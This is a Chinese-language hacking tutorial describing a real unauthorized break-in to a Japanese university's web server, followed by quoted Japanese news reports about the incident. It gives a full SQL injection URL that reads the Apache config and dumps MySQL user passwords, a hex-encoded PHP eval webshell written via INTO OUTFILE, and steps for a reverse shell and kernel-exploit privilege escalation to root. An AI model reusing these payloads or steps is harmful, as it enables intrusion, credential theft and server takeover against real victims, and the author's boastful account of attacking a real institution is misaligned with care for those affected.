今天在群里被抓苦力了，大家讨论着妹纸，群主就说他们学校的几个日本妹纸来自日本的一个学校：京都同志社大学http://www.2cto.com/（替代网址）
想从妹子毕业的学校搞点资料什么的，然后他就YD的渗透了，然后就成功了。然后就把注入的段子发给了我，抓我做壮丁，让我把权提了，顺便写个教程发出来，因为论坛没有太多关于Linux提权的教程~~~~
先是注入点：
  
http://www.2cto.com /chs/news/index.php?i=-1
 
然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
 
    http://www.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file('/etc/httpd/conf/httpd.conf'),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user//@@datadir为数据库文件路径

//load_file读取网站容器apache的配置文件
//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。

而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
 
前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
 
既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
直接写一句话：
 

1     http://www.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+'/http/www/koho/english/engnews_img/aa.php'#
2     //最后的#是为了闭合前面的语句
3     /*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
4     为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/
5     //如果直接select 一句话into outfile '路径'会提示字段数不同，所以select 1,2,3,4...来执行注入语句
6     //后面的0x3c3f2f2a和0x2a2f3f3e分别为'<?php //'的和'?>'HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
7     //所以最后aa.php的内容就是"<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>"
HEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
通过上述注入语句，我们就得到了一句话木马:
 
   http://www.2cto.com /english/engnews_img/aa.php

复制代码用菜刀连接，密码是cmd，如图所示：

上传大马，得到：http://www.doshisha.ac.jp/english/engnews_img/script.php
直接用shell里面的反弹功能反弹到本地先，本地监听：

远程服务器端转发：

然后在命令提示行里看了一下，现在的权限是：

之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。

好在赋权给这个文件夹不需要root，直接执行赋权语句：
 
  chmod +x /tmp/
复制代码在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行

 
1     uname-a
2     //其实lsb_release -a

如图所示：

内核版本：linux mainz1 2.6.28-194.e15
系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

然后给予执行权限
一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样

 

得到了root权限好的，文章到此结束。说点额外话
我们驻扎在这个学校的服务器还没有改过数据，删过东西，第六天管理员就把网站关闭了并且踢了我们，效率很高。关站以后公告如下：

ホームページの一時停止について

過日、本学ホームページのWebサーバに対し不正アクセスがありました。
当該Webサーバは個人情報を管理する役割を持たないため、個人情報漏洩等の被害は
無いと認識しておりますが、第三者機関による詳細調査と更なる不正アクセスの防止のため、
現在は本学公式ホームページを閉鎖し、代替措置として下記の簡易コンテンツを
掲載のうえ、復旧に努めています。
大変なご不便・ご迷惑をおかけいたしますが、何卒ご理解とご協力を賜りますようお願い申し上げます。
关闭网站还是小事，众所周知日本有四大报业集团，关闭网站后日本的四大报业均报道了这件事情，新闻链接和摘抄如下：
每日新闻的报道：http://mainichi.jp/select/biz/news/20120114k0000e040185000c.html

1. 同志社大：不正アクセスでＨＰ閉鎖
2. 　同志社大（京都市）がホームページ（ＨＰ）のサーバーに不正アクセスがあったとして、ＨＰを閉鎖していたことが１４日、分かった。ＨＰの改ざんや個人情報の流出は確認されていない。
3. 　同大学によると、中国のインターネット掲示板に同大学へのサイバー攻撃を呼びかける書き込みが見つかった。中国からの不正アクセスとみて侵入経路を調べるとともに、受験情報などを簡易版ＨＰで掲載している。
4. 　今月６日に大学職員がサーバーの定期チェックをし、外部から侵入された形跡を発見。サーバー内に個人情報は保存されておらず、入試問題を含め情報漏えいは無いという。同大学は外部のセキュリティー管理会社に調査を依頼し、１１日からＨＰを閉鎖している。【五十嵐和大】

朝日新闻社的报道：http://www.asahi.com/digital/internet/OSK201201140064.html

同志社大に不正アクセス、ＨＰ閉鎖　中国からの閲覧急増
同 志社大（京都市上京区）はサーバーに不正アクセスがあったとして、公式ホームページ（ＨＰ）を１１日から閉鎖し、代替用に簡易版ＨＰを設けた。職員が６ 日、データを書き換えようとした痕跡を見つけ調査。年末年始に中国からの閲覧者が急増し、中国のハッカー用掲示板に同志社大のＨＰを攻撃する方法が掲載さ れたという。ＨＰは大学案内が中心で個人情報は掲載しておらず、情報がもれた形跡もないという。さらなる不正アクセスを防止するため業者に詳しい調査を依 頼し、セキュリティーのレベルを上げるという
看到这里我感触很深。在日本一个普通大学被入侵，虽然没有任何损失，但是由于日本的媒体曝光和问责制度，除了逼迫着管理人员加强安全措施，更让原负责任丢了饭碗。
和这个行程鲜明对比的是，网站被驻扎一年不改改首页管理员是不会知道的，被踢出去也是被后面上来的黑客踢出去的。
就算是网站首页被改，因为网站运营者不重视，管理员没责任，黑客还是进出自如，脱库、挂马、改页，样样不缺。

总结：
这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root